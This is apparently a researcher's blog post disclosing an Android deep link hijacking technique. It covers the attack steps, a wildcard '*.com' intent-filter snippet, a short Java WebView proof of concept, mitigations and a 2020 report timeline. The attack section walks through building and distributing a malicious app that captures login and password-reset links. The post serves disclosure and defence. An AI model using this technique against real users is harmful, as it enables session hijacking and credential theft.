In this blog, I will explain how I discovered a vulnerability that allowed me to take over multiple accounts by exploiting deep links in Android applications.

Deep Link

Deep links are a type of link that sends users directly to an app instead of a website or store. They are used to navigate users to specific in-app locations, saving time and improving user experience.

Deep linking works by specifying a custom URL scheme (iOS Universal Links) or an intent URL (on Android) that opens an app if it's already installed. These links can also be used for campaigns or specific events.

Attack

Android has a component called "App Links," specifically developed for triggering mobile applications. Even if the app is updated, deep link hijacking remains possible.

Here's how an attacker can exploit it:

  1. The attacker develops a malicious app with a deep link hijacking payload.
  2. When a user clicks on a deep link, a prompt appears asking whether to open the link "JUST ONCE" or "ALWAYS."
  3. If the user selects "ALWAYS," the malicious app is triggered whenever a deep link is clicked.
  4. The attacker updates the app to extend the payload, allowing it to hijack any deep link.
  5. Users receive and install the update from the Google Play Store.
  6. After the update, any clicked link triggers the malware without user interaction.

Technical Explanation

The vulnerability arises from the misuse of Android's intent-filter. By modifying the deep link host pattern in an app update, an attacker can hijack all URLs and force them to open inside the malicious application.


    <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <category android:name="android.intent.category.BROWSABLE"/>
        <data android:scheme="https" android:host="cappriciosec.com"/>
        <data android:scheme="https" android:host="*.com"/>
    </intent-filter>
                    

Initially, users grant permission only for cappriciosec.com. However, after an update, the wildcard *.com allows all domains to be hijacked. This means sensitive links (Google login, banking pages, etc.) open inside the malicious app.

Impact

This vulnerability can be exploited to:

  • Hijack session tokens
  • Bypass two-factor authentication (2FA)
  • Steal password reset links or tokens
  • Compromise account credentials
  • Intercept and manipulate web requests

Steps to Reproduce

  1. Develop an Android malware with a deep link hijacking payload.
  2. Distribute the malicious app and trick users into installing it.
  3. Users grant permission to open specific deep links.
  4. Update the app with a new payload to hijack all deep links.
  5. Now, any link clicked by the user triggers the malware automatically.

Proof of Concept (POC)


    public class MainActivity extends AppCompatActivity {
        private WebView webview;
        private Uri url;
                        
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            setContentView(R.layout.activity_main);
                            
            if (getIntent() != null || getIntent().getData() != null) {
            url = getIntent().getData();
            webview = findViewById(R.id.web);
            webview.setWebViewClient(new WebViewClient());
            webview.loadUrl(String.valueOf(url));
                                
            WebSettings webSettings = webview.getSettings();
            webSettings.setJavaScriptEnabled(true);
                                
            Toast.makeText(getApplicationContext(), "Hacked", Toast.LENGTH_SHORT).show();
                }
            }
        }                    
                    

POC Video 1

POC Video 2

POC Video 3

Mitigation

To prevent deep link hijacking, developers should:

  • Verify package name and domain integrity before opening a deep link.
  • Use Digital Asset Links (DAL) to validate the app's ownership of a domain.
  • Restrict the scope of intent-filters and avoid wildcard hosts.
  • Enforce strong authentication before processing sensitive deep links.

Timeline

  • Reported to Android OS Security Team: August 7, 2020
  • Issue Created: August 10, 2020
  • Assigned Date: August 11, 2020
Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!